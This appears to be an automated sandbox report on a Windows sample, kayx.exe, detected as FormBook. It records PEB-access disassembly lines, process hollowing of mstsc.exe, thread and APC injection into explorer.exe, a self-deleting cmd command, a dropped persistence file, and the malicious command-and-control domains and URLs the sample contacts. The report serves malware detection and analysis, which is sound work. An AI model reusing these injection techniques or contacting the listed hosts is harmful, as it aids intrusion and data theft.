Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86C0A mov eax, dword ptr fs:[00000030h] 17_2_00E86C0A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86C0A mov eax, dword ptr fs:[00000030h] 17_2_00E86C0A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1D5E0 mov eax, dword ptr fs:[00000030h] 17_2_00E1D5E0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1D5E0 mov eax, dword ptr fs:[00000030h] 17_2_00E1D5E0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECFDE2 mov eax, dword ptr fs:[00000030h] 17_2_00ECFDE2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECFDE2 mov eax, dword ptr fs:[00000030h] 17_2_00ECFDE2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECFDE2 mov eax, dword ptr fs:[00000030h] 17_2_00ECFDE2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECFDE2 mov eax, dword ptr fs:[00000030h] 17_2_00ECFDE2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EB8DF1 mov eax, dword ptr fs:[00000030h] 17_2_00EB8DF1
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h] 17_2_00E86DC9
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h] 17_2_00E86DC9
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h] 17_2_00E86DC9
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86DC9 mov ecx, dword ptr fs:[00000030h] 17_2_00E86DC9
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h] 17_2_00E86DC9
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h] 17_2_00E86DC9
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED05AC mov eax, dword ptr fs:[00000030h] 17_2_00ED05AC
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED05AC mov eax, dword ptr fs:[00000030h] 17_2_00ED05AC
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E335A1 mov eax, dword ptr fs:[00000030h] 17_2_00E335A1
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E31DB5 mov eax, dword ptr fs:[00000030h] 17_2_00E31DB5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E31DB5 mov eax, dword ptr fs:[00000030h] 17_2_00E31DB5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E31DB5 mov eax, dword ptr fs:[00000030h] 17_2_00E31DB5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h] 17_2_00E32581
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h] 17_2_00E32581
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h] 17_2_00E32581
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h] 17_2_00E32581
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h] 17_2_00E02D8A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h] 17_2_00E02D8A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h] 17_2_00E02D8A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h] 17_2_00E02D8A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h] 17_2_00E02D8A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3FD9B mov eax, dword ptr fs:[00000030h] 17_2_00E3FD9B
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3FD9B mov eax, dword ptr fs:[00000030h] 17_2_00E3FD9B
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2C577 mov eax, dword ptr fs:[00000030h] 17_2_00E2C577
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2C577 mov eax, dword ptr fs:[00000030h] 17_2_00E2C577
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E43D43 mov eax, dword ptr fs:[00000030h] 17_2_00E43D43
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E83540 mov eax, dword ptr fs:[00000030h] 17_2_00E83540
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EB3D40 mov eax, dword ptr fs:[00000030h] 17_2_00EB3D40
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E27D50 mov eax, dword ptr fs:[00000030h] 17_2_00E27D50
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0AD30 mov eax, dword ptr fs:[00000030h] 17_2_00E0AD30
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECE539 mov eax, dword ptr fs:[00000030h] 17_2_00ECE539
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E34D3B mov eax, dword ptr fs:[00000030h] 17_2_00E34D3B
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E34D3B mov eax, dword ptr fs:[00000030h] 17_2_00E34D3B
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E34D3B mov eax, dword ptr fs:[00000030h] 17_2_00E34D3B
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED8D34 mov eax, dword ptr fs:[00000030h] 17_2_00ED8D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E8A537 mov eax, dword ptr fs:[00000030h] 17_2_00E8A537
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E316E0 mov ecx, dword ptr fs:[00000030h] 17_2_00E316E0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E176E2 mov eax, dword ptr fs:[00000030h] 17_2_00E176E2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E48EC7 mov eax, dword ptr fs:[00000030h] 17_2_00E48EC7
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EBFEC0 mov eax, dword ptr fs:[00000030h] 17_2_00EBFEC0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E336CC mov eax, dword ptr fs:[00000030h] 17_2_00E336CC
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED8ED6 mov eax, dword ptr fs:[00000030h] 17_2_00ED8ED6
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED0EA5 mov eax, dword ptr fs:[00000030h] 17_2_00ED0EA5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED0EA5 mov eax, dword ptr fs:[00000030h] 17_2_00ED0EA5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED0EA5 mov eax, dword ptr fs:[00000030h] 17_2_00ED0EA5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E846A7 mov eax, dword ptr fs:[00000030h] 17_2_00E846A7
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E9FE87 mov eax, dword ptr fs:[00000030h] 17_2_00E9FE87
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1766D mov eax, dword ptr fs:[00000030h] 17_2_00E1766D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h] 17_2_00E2AE73
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h] 17_2_00E17E41
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECAE44 mov eax, dword ptr fs:[00000030h] 17_2_00ECAE44
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0E620 mov eax, dword ptr fs:[00000030h] 17_2_00E0E620
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EBFE3F mov eax, dword ptr fs:[00000030h] 17_2_00EBFE3F
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0C600 mov eax, dword ptr fs:[00000030h] 17_2_00E0C600
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E38E00 mov eax, dword ptr fs:[00000030h] 17_2_00E38E00
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1608 mov eax, dword ptr fs:[00000030h] 17_2_00EC1608
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3A61C mov eax, dword ptr fs:[00000030h] 17_2_00E3A61C
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E437F5 mov eax, dword ptr fs:[00000030h] 17_2_00E437F5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E18794 mov eax, dword ptr fs:[00000030h] 17_2_00E18794
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E87794 mov eax, dword ptr fs:[00000030h] 17_2_00E87794
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1FF60 mov eax, dword ptr fs:[00000030h] 17_2_00E1FF60
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED8F6A mov eax, dword ptr fs:[00000030h] 17_2_00ED8F6A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1EF40 mov eax, dword ptr fs:[00000030h] 17_2_00E1EF40
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E04F2E mov eax, dword ptr fs:[00000030h] 17_2_00E04F2E
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3E730 mov eax, dword ptr fs:[00000030h] 17_2_00E3E730
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED070D mov eax, dword ptr fs:[00000030h] 17_2_00ED070D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3A70E mov eax, dword ptr fs:[00000030h] 17_2_00E3A70E
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2F716 mov eax, dword ptr fs:[00000030h] 17_2_00E2F716
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E9FF10 mov eax, dword ptr fs:[00000030h] 17_2_00E9FF10
Enables debug privileges
Source: C:\Users\user\Desktop\kayx.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\mstsc.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\kayx.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 184.168.131.241 80
Source: C:\Windows\explorer.exe Network Connect: 198.185.159.141 80
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\kayx.exe Memory written: C:\Users\user\Desktop\kayx.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\kayx.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\kayx.exe Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\kayx.exe Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\mstsc.exe Thread register set: target process: 3388
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\kayx.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\kayx.exe Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 3F0000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\kayx.exe Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\kayx.exe'
Source: explorer.exe, 00000012.00000002.482884776.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\kayx.exe Queries volume information: C:\Users\user\Desktop\kayx.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe VolumeInformation
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_05C4C920 GetUserNameA, 1_2_05C4C920
Source: C:\Users\user\Desktop\kayx.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Behavior Graph (ID: 321226, Sample: kayx.exe, Startdate: 20/11/2020, Architecture: WINDOWS, Score: 100)

Top-level DNS/IP: www.amtpsychology.com
Top-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 6 other signatures

Process tree:
  • kayx.exe (started)
      Dropped files: C:\Users\user\AppData\...\firefoxe.exe (PE32); C:\Users\...\firefoxe.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\kayx.exe.log (ASCII)
      Signatures: Detected unpacking (changes PE section rights); Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
      • kayx.exe (started), kayx.exe (started), kayx.exe (started)
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
          • explorer.exe (injected)
              DNS/IP: jibenentreprenad.mobi 184.168.131.241, 49744, 80, AS-26496-GO-DADDY-COM-LLCUS, United States; www.jibenentreprenad.mobi; 2 other IPs or domains
              Signatures: System process connects to network (likely due to code injection or exploit)
              • mstsc.exe (started)
                  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                  • cmd.exe (started)
                      • conhost.exe (started)
              • firefoxe.exe (started)
              • firefoxe.exe (started)

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
184.168.131.241 | unknown | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
198.185.159.141 | unknown | United States | 53831 | SQUARESPACEUS | false

Contacted Domains

Name | IP | Active
jibenentreprenad.mobi | 184.168.131.241 | true
ext-sq.squarespace.com | 198.185.159.141 | true
www.jibenentreprenad.mobi | unknown | unknown
www.ghoster.agency | unknown | unknown
www.amtpsychology.com | unknown | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.jibenentreprenad.mobi/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX | true | Avira URL Cloud: safe | unknown
http://www.ghoster.agency/bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiX | true | Avira URL Cloud: safe | unknown